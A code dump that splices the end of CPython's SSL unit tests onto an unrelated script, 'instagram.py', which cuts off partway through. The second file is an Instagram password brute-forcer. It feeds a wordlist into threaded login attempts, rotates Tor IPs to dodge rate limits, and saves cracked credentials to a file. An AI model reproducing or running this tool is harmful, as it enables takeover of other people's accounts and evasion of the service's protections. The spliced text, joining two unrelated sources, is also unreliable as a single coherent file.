try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, True)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, True,
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
instagram.py | # Date: 06/10/2017
# Distro: Kali linux
# Desc: Instagram Bruteforce
#
#
import os
import time
import urllib
import argparse
import threading
import subprocess
from platform import platform
from Core.tor import TorManager
from Core.Browser import Browser
class Instagram(TorManager,Browser):
def __init__(self,username,wordlist):
self.username = username
self.wordlist = wordlist
self.lock = threading.Lock()
self.ip = None
self.tries = 0
self.wait = False
self.alive = True
self.isFound = False
self.passlist = []
self.recentIps = []
#for browser
self.url = 'https://www.instagram.com/accounts/login/?force_classic_login'
self.form1 = 'username'
self.form2 = 'password'
Browser.__init__(self)
TorManager.__init__(self)
self.n = '\033[0m'
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
def kill(self,msg=None):
self.alive = False
self.stopTor()
try:
if self.isFound:
self.display(msg)
print (' [-] Password Found!')
with open('Cracked.txt','a') as f:
f.write('[-] Username: {}\n[-] Password: {}\n\n'.\
format(self.username,msg))
if all([not self.isFound, msg]):
print ('\n [-] {}'.format(msg))
finally:exit()
def modifylist(self):
if len(self.recentIps) == 5:
del self.recentIps[0]
# failsafe
if len(self.recentIps) > 5:
while all([len(self.recentIps) > 4]):
del self.recentIps[0]
def manageIps(self,rec=2):
ip = self.getIp()
if ip:
if ip in self.recentIps:
self.updateIp()
self.manageIps()
self.ip = ip
self.recentIps.append(ip)
else:
if rec:
self.updateIp()
self.manageIps(rec-1)
else:
self.connectionHandler()
def changeIp(self):
self.createBrowser()
self.updateIp()
self.manageIps()
self.modifylist()
self.deleteBrowser()
def setupPasswords(self):
with open(self.wordlist,'r') as passwords:
for pwd in passwords:
pwd = pwd.replace('\n','')
if len(self.passlist) < 5:
self.passlist.append(pwd)
else:
while all([self.alive,len(self.passlist)]):pass
if not len(self.passlist):
self.passlist.append(pwd)
# done reading files
while self.alive:
if not len(self.passlist):
self.alive = False
def connectionHandler(self):
if self.wait:return
self.wait = True
print (' [-] Waiting For Connection {}...{}'.format(self.g,self.n))
while all([self.alive,self.wait]):
try:
self.updateIp()
urllib.urlopen('https://wtfismyip.com/text')
self.wait = False
break
except IOError:
time.sleep(1.5)
self.manageIps()
def attempt(self,pwd):
with self.lock:
self.tries+=1
self.createBrowser()
html = self.login(pwd)
self.deleteBrowser()
if html:
if all([not self.form1 in html,not self.form2 in html]):
self.isFound = True
self.kill(pwd)
del self.passlist[self.passlist.index(pwd)]
def run(self):
self.display()
time.sleep(1.3)
threading.Thread(target=self.setupPasswords).start()
while self.alive:
bot = None
for pwd in self.passlist:
bot = threading.Thread(target=self.attempt,args=[pwd])
bot.start()
# wait for bot
if bot:
while all([self.alive,bot.is_alive()]):pass
if self.alive:
self.changeIp()
def display(self,pwd=None):
pwd = pwd if pwd else ''
ip = self.ip if self.ip else ''
creds = self.r if not self.isFound else self.g
attempts = self.tries if self.tries else ''
subprocess.call(['clear'])
print ('')
print (' +------- Instagram -------+')
print (' [-] Username: {}{}{}'.format(creds,self.username.title(),self.n))
print (' [-] Password: {}{}{}'.format(creds,pwd,self.n))
print (' [-] Proxy IP: {}{}{}'.format(self.b,ip,self.n))
print (' [-] Attempts: {}{}{}'.format(self.y,attempts,self.n))
print ('')
if not ip:
